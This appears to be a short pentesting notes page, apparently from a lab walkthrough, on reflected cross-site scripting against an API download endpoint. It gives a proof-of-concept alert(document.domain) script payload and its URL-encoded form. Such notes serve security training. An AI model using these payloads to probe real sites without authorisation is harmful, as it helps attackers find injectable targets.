Cross-Site Scripting (XSS)

Cross-Site Scripting (XSS) vulnerabilities affect web applications and APIs alike. An XSS vulnerability may allow an attacker to execute arbitrary JavaScript code within the target's browser and result in complete web application compromise if chained together with other vulnerabilities.

Interact with the API with a random value

http://SERVER_IP:PORT/api/download/randomvalue

Since the value is reflected in the response, try to enter a payload.

XSS payload

<script>alert(document.domain)</script>

Or the encoded version

%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E

PreviousLocal File Inclusion (LFI)NextServer-Side Request Forgery (SSRF)

Last updated 2 months ago